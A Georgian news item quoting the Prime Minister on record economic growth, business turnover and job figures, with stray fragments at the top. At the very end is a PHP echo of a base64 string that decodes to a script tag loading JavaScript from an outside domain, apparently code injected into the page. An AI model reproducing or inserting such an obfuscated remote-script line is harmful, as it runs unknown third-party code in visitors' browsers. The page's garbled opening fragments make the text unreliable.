celsiusi
ავერსი შნაიდერი

პრემიერის თქმით, ბიზნეს სექტორში, მესამე კვარტალში სამუშაო ადგილები გაიზარდა 45 000-ით და ჯამში შეადგინა 723 000, რაც რეკორდული მაჩვენებელია.

„ახლა რამდენიმე სხვა საკითხზე მინდა გადავიდე. პირველ რიგში, მინდა ვთქვა, რომ რამდენიმე დღის წინ გამოვიდა საქსტატის ბოლო მონაცემები. იანვარ-ოქტომბრის განმავლობაში ეკონომიკური ზრდის მაჩვენებელი 10%-ით განისაზღვრა და ასევე მინდა ვთქვა, რომ მესამე კვარტალში, ბიზნესსექტორის ბრუნვა 17%-ით გაიზარდა და 47 მილიარდი ლარი შეადგინა. ეს არის ჩვენი სწორი პოლიტიკის შედეგი. ბიზნესს მინდა კიდევ ერთხელ მივმართო. ბიზნესმა ყველაზე კარგად იცის - ქვეყანაში რომ არ იყოს სტაბილურობა და მშვიდობა, არავითარი ბიზნეს ბრუნვის ზრდა, დასაქმება და ახალი სამუშაო ადგილების შექმნა არ იქნებოდა. ქვეყანას გადააქცევდნენ პოლიგონად. ამას გარდა, იცით, რომ სამუშაო ადგილები გაიზარდა და რეკორდული ზრდა არის სამუშაო ადგილების. ბიზნეს სექტორში, მესამე კვარტალში სამუშაო ადგილები გაიზარდა 45 000-ით და ჯამში შეადგინა 723 000, რაც რეკორდული მაჩვენებელია და შეიძლება ითქვას, რომ პანდემიამდელ მაჩვენებელს საგრძნობლად გადააჭარბა ამ მაჩვენებელმა“, - განაცხადა პრემიერმა.

317
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");